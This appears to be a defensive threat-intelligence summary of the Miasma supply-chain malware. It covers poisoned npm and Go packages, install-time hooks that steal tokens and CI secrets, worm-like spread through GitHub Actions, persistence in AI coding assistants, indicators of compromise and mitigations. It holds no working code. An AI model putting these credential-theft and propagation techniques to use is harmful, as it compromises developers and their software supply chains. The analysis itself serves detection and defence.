Full Report
Cybersecurity researchers have flagged yet another evolution of the supply chain attack linked to the Mini Shai-Hulud, Miasma, and Hades malware family that has compromised a new set of npm packages, even as it has propagated to the Go ecosystem. "The latest activity includes malicious npm releases affecting LeoPlatform and RStreams packages, GitHub Actions workflow abuse, and a related Go
Analysis Summary
# Tool/Technique: Miasma (Mini Shai-Hulud / Hades Family)
## Overview
Miasma is a sophisticated malware family involved in multi-ecosystem supply chain attacks. It primarily targets developers by poisoning package registries (npm, PyPI, Go) to harvest credentials, GitHub tokens, and CI/CD secrets. The goal is to weaponize stolen data to propagate further across trusted developer workflows and repositories.
## Technical Details
- **Type:** Malware family / Infostealer
- **Platform:** Cross-platform (JavaScript/Node.js, Go, Python, Linux/macOS/Windows)
- **Capabilities:** Credential harvesting, CI/CD secret theft, automated propagation, environment fingerprinting.
- **First Seen:** June 2026 (Reflecting the provided article date)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1195.001 - Supply Chain Compromise: Compromise Software Dependencies]
- **[TA0003 - Persistence]**
- [T1133 - External Remote Services (via stolen tokens)]
- **[TA0006 - Credential Access]**
- [T1552.001 - Unsecured Credentials: Credentials In Files]
- [T1555 - Credentials from Password Stores]
- **[TA0007 - Discovery]**
- [T1614.001 - System Location Discovery: System Language Discovery]
- **[TA0010 - Exfiltration]**
- [T1567.001 - Exfiltration Over Web Service: Exfiltration to Code Repository]
## Functionality
### Core Capabilities
- **Registry Poisoning:** Uploads trojanized versions of popular packages (e.g., LeoPlatform, RStreams) using compromised maintainer tokens.
- **Credential Theft:** Scans local environments for AWS keys, npm tokens, GitHub Personal Access Tokens (PATs), and OIDC tokens.
- **Install-Time Execution:** Uses `binding.gyp` or `package.json` lifecycle hooks to execute malicious scripts immediately upon package download.
- **Dead-Drop Resolvers:** Uses GitHub repository descriptions (e.g., "Alright Lets See If This Works") as a mechanism to coordinate or relay stolen data.
### Advanced Features
- **CI/CD Hijacking:** Specifically targets GitHub Actions runners to scrape secrets directly from memory.
- **Language Killswitch:** Features a locale check (Russian) to avoid execution on systems in specific geographic regions.
- **Persistence via Developer Tools:** Attempts to establish persistence within IDEs and AI coding assistants.
- **Automated Worm-like Propagation:** When a GitHub Action is compromised, the malware attempts to push malicious commits to other repositories accessible via the stolen credentials.
## Indicators of Compromise
- **File Names:** `binding.gyp` (maliciously modified), "Run Copilot" (malicious GitHub Action workflow).
- **Network Indicators:**
- `github[.]com/verana-labs/verana-blockchain` (Compromised Go module)
- Public GitHub repositories with the description: "Alright Lets See If This Works"
- **Behavioral Indicators:**
- Deployment of Bun runtime during npm package installation.
- Unexpected `git push` or `git commit` actions from GitHub Action runners.
- Encryption of local files using AES-128-GCM before exfiltration.
- Strings: `RevokeAndItGoesKaboom`, `IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner`.
## Associated Threat Actors
- Unknown (Current research links the activity to a specific operational cluster targeting the JavaScript and Go ecosystems).
## Detection Methods
- **Signature-based:** Scan for the unique strings "RevokeAndItGoesKaboom" and "Alright Lets See If This Works" within CI/CD logs and repository descriptions.
- **Behavioral:** Monitor for `binding.gyp` scripts that initiate network connections or download external runtimes (like Bun) during `npm install`.
- **YARA:** Create rules targeting the specific JavaScript loader patterns used to fetch the second-stage payload.
## Mitigation Strategies
- **Namespace Contention:** Use private registries or scoped packages to prevent dependency confusion.
- **Credential Hygiene:** Enable Multi-Factor Authentication (MFA) for all package registry accounts (npm, PyPI) and use short-lived OIDC tokens instead of long-lived PATs in CI/CD.
- **Action Pinning:** Pin GitHub Actions to specific full length commit SHA-1 hashes rather than tags (which can be moved by an attacker).
- **Network Egress Filtering:** Restrict the ability of CI/CD runners to communicate with arbitrary external domains.
## Related Tools/Techniques
- **Mini Shai-Hulud / Hades:** Earlier variants of the same malware lineage.
- **Typosquatting:** Similar distribution method often used alongside registry poisoning.